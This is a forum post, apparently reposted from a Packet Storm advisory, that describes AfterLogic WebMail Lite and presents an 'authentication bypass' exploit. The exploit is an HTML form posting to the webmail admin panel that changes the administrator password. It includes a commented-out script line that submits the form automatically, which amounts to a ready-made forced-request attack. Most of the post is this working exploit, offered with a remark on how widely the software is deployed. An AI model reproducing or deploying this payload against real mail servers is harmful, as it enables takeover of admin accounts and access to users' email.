Jump to content
KhiZaRix

AfterLogic WebMail Lite Authentication Bypass

Recommended Posts

Posted

AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client

with Ajax interface. AfterLogic WebMail Lite is available for both PHP

and ASP.NET platforms.

The version of AfterLogic WebMail Lite that is written in PHP is free

and open-source software subject to the terms of the Affero General

Public License (AGPL) version 3. The version written in ASP.NET is

proprietary software available as freeware.

And is deployed over 5/20 mailsevers, quite popular.

This exploit attempts to exploit the admin and get(s) us a new

password to the admin panel which should be located at

site.com/mail/adminpanel/index.php

<h2>After Logic Mail - Change Admin Password Exploit</h2>

<form action="http://localhost/webmail/adminpanel/index.php?submit"

method="POST" id="security_form">

<input type="hidden" name="form_id" value="security">

<input type="text" class="wm_input" name="txtUserName"

id="txtUserName" value="mailadm" size="30" />

<input type="password" class="wm_input" name="txtNewPassword"

id="txtNewPassword" value="newpass" size="30" />

<input type="password" class="wm_input" name="txtConfirmNewPassword"

id="txtConfirmNewPassword" value="newpass" size="30" />

<input type="submit" name="submit_btn" value="Save" id="automate">

</form>

<script>

//uncomment the second line for automation

//document.getElementById('automate').click();

</script>

Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...